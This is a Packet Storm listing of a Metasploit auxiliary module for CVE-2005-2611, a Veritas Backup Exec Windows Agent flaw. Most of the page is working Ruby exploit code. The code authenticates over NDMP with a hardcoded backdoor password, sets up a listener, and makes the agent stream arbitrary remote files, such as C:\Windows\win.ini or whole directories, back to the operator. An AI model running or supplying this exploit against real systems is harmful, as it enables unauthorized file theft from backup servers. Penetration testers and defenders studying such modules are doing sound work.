This Metasploit module abuses a logic flaw in the Backup Exec Windows Agent to download arbitrary files from the system. This flaw was found by someone who wishes to remain anonymous and affects all known versions of the Backup Exec Windows Agent. The output file is in MTF format, which can be extracted by the NTKBUp program listed in the references section. To transfer an entire directory, specify a path that includes a trailing backslash.
226940d66a9c4cacaf0a73b81c75fdaea375765b84cbee186b391bbf5c6295da##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::NDMP
def initialize(info = {})
super(update_info(info,
'Name' => 'Veritas Backup Exec Windows Remote File Access',
'Description' => %q{
This module abuses a logic flaw in the Backup Exec Windows Agent to download
arbitrary files from the system. This flaw was found by someone who wishes to
remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
listed in the references section. To transfer an entire directory, specify a
path that includes a trailing backslash.
},
'Author' => [ 'hdm', 'Unknown' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2005-2611'],
['OSVDB', '18695'],
['BID', '14551'],
['URL', 'https://web.archive.org/web/20120227144337/http://www.fpns.net/willy/msbksrc.lzh'],
],
'Actions' =>
[
['Download', 'Description' => 'Download arbitrary file']
],
'DefaultAction' => 'Download'
))
register_options(
[
Opt::RPORT(10000),
OptAddressLocal.new('LHOST',
[
false,
"The local IP address to accept the data connection"
]
),
OptPort.new('LPORT',
[
false,
"The local port to accept the data connection"
]
),
OptString.new('RPATH',
[
true,
"The remote filesystem path to download",
"C:\\Windows\\win.ini"
]
),
OptString.new('LPATH',
[
true,
"The local filename to store the exported data",
"backupexec_dump.mtf"
]
),
])
end
def run
print_status("Attempting to retrieve #{datastore['RPATH']}...")
lfd = File.open(datastore['LPATH'], 'wb')
connect
data = ndmp_recv()
if (not data)
print_error("Did not receive a response from the agent")
disconnect
return
end
username = "root"
password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"
#
# Authenticate using the backdoor password
#
auth = [
1,
Time.now.to_i,
0,
0x0901,
0,
0,
2,
username.length,
username,
password
].pack('NNNNNNNNA*A*')
print_status("Sending magic authentication request...")
ndmp_send(auth)
data = ndmp_recv()
if (not data)
print_error("Did not receive a response to our authentication request")
disconnect
return
end
#
# Create our listener for the data connection
#
print_status("Starting our data listener...")
sfd = Rex::Socket.create_tcp_server(
'LocalPort' => datastore['LPORT']
)
local_addr = (datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']))
local_port = sfd.getsockname[2]
#
# Create the DATA_CONNECT request
#
conn = [
3,
0,
0,
0x040a,
0,
0,
1,
Rex::Socket.resolv_nbo(local_addr, false),
local_port
].pack('NNNNNNNA4N')
print_status("Sending data connection request...")
ndmp_send(conn)
data = ndmp_recv()
if (not data)
print_error("Did not receive a response to our data connection request")
sfd.close
disconnect
return
end
#
# Wait for the agent to connect back
#
print_status("Waiting for the data connection...")
rfd = sfd.accept()
sfd.close
#
# Create the Mover Set Record Size request
#
msrs = [
4,
0,
0,
0x0a08,
0,
0,
0x8000
].pack('NNNNNNN')
print_status("Sending transfer parameters...")
ndmp_send(msrs)
data = ndmp_recv()
if (not data)
print_error("Did not receive a response to our parameters request")
disconnect
return
end
#
# Define our transfer parameters
#
xenv =
[
['USERNAME', ''],
['BU_EXCLUDE_ACTIVE_FILES', '0'],
['FILESYSTEM', "\"\\\\#{datastore['RHOST']}\\#{datastore['RPATH']}\",v0,t0,l0,n0,f0"]
]
#
# Create the DATA_START_BACKUP request
#
bkup = [
5,
0,
0,
0x0401,
0,
0,
4
].pack('NNNNNNN')
bkup += "dump"
bkup += [ xenv.length ].pack('N')
#
# Encode the transfer parameters
#
xenv.each do |e|
k,v = e
# Variable
bkup += [k.length].pack('N')
bkup += k
bkup += Rex::Encoder::NDR.align(k)
# Value
bkup += [v.length].pack('N')
bkup += v
bkup += Rex::Encoder::NDR.align(v)
end
bkup[-1, 1] = "\x01"
print_status("Sending backup request...")
ndmp_send(bkup)
data = ndmp_recv()
if (not data)
print_error("Did not receive a response to our backup request")
disconnect
return
end
#
# Create the GET_ENV request
#
genv = [
5,
0,
0,
0x4004,
0,
0
].pack('NNNNNN')
print_status("Sending environment request...")
ndmp_send(genv)
data = ndmp_recv()
if (not data)
print_error("Did not receive a response to our environment request")
disconnect
return
end
#
# Start transferring data
#
print_status("Transferring data...")
bcnt = 0
begin
while (data = rfd.get_once)
bcnt += data.length
lfd.write(data)
end
rescue ::EOFError
end
lfd.close
rfd.close
print_status("Transferred #{bcnt} bytes.")
disconnect
end
end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed